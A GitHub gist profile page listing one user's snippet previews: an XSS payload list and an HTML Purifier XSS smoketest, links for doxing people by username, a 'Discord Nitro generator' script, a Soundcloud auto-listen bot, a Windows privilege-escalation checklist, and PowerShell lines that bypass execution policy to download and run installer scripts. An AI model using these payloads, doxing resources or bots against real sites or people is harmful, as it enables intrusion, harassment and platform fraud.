Skip to content

Instantly share code, notes, and snippets.

Avatar
🏴
Making projects which help engineers to build awesome things.

f13end

🏴
Making projects which help engineers to build awesome things.
View GitHub Profile
View Search engines for Hackers
https://censys.io
https://shodan.io
https://viz.greynoise.io
https://zoomeye.org
https://netograph.io
https://wigle.net
https://intelx.io
https://fofa.so
https://hunter.io
View HTML Purifier XSS Attacks Smoketest
XSS attacks are from http://ha.ckers.org/xss.html.
Caveats: Google.com has been programatically disallowed, but as you can see, there are ways of getting around that, so coverage in this area is not complete. Most XSS broadcasts its presence by spawning an alert dialogue. The displayed code is not strictly correct, as linebreaks have been forced for readability. Linewraps have been marked with ». Some tests are omitted for your convenience. Not all control characters are displayed.
Test
Name Raw Output Render
XSS Locator
';alert(String.fromCharCode( »
88,83,83))//\';alert(String. »
fromCharCode(88,83,83))//";a »
View Doxing
1: Username (Alias)
http://namechk.com/
http://knowem.com/
http://www.namecheckr.com/
http://checkusernames.com/
http://usersherlock.com/
https://www.usersearch.org/
2: Archives
https://archive.org/index.php
View xss payload list
<script\x20type="text/javascript">javascript:alert(1);</script>
<script\x3Etype="text/javascript">javascript:alert(1);</script>
<script\x0Dtype="text/javascript">javascript:alert(1);</script>
<script\x09type="text/javascript">javascript:alert(1);</script>
<script\x0Ctype="text/javascript">javascript:alert(1);</script>
<script\x2Ftype="text/javascript">javascript:alert(1);</script>
<script\x0Atype="text/javascript">javascript:alert(1);</script>
'`"><\x3Cscript>javascript:alert(1)</script>
'`"><\x00script>javascript:alert(1)</script>
<img src=1 href=1 onerror="javascript:alert(1)"></img>
@f13end
f13end / discord.py
Created Apr 23, 2020
DISCORD NITRO GENERATOR
View discord.py
import random
import string
from colorama import init, Fore, Back, Style
import colorama
init(convert=True)
f = open('nitro_codes.txt', 'a')
amount = int(input())
fix = 1
@f13end
f13end / soundcloudbot.py
Created Apr 23, 2020
Auto listen for Soundcloud
View soundcloudbot.py
from selenium import webdriver
from selenium.webdriver.chrome.options import Options
chrome_options = Options()
# chrome_options.add_argument("--disable-extensions")
# chrome_options.add_argument("--headless")
chrome_options.add_argument("--mute-audio")
chrome_options.add_argument('--ignore-certificate-errors')
View Privilege Escalation.md

Windows Privilege Escalation Techniques

  1. Buffer Overflow
  2. DLL Injection
  3. DLL Hijacking
  4. Token Manipulation
  5. Insecure Files Permission
  6. Insecure Folders Permission
  7. Insecure Service Permission
  8. Insecure Registery Permission
View holochain kodlar
WINDOWS
Powershell admin olarak calistirdiktan sonra;
1- Chocolatey
Set-ExecutionPolicy Bypass -Scope Process -Force; iex ((New-Object System.Net.WebClient).DownloadString('https://chocolatey.org/install.ps1'))
2- Holochain
Set-ExecutionPolicy Bypass -Scope Process -Force; iex ((New-Object System.Net.WebClient).DownloadString('https://raw.githubusercontent.com/holochain/hcup/master/hcup-bootstrap.ps1'))
@f13end
f13end / intro.md
Last active Feb 16, 2019 — forked from derhuerst/intro.md
Installing Git on Linux, Mac OS X and Windows
View intro.md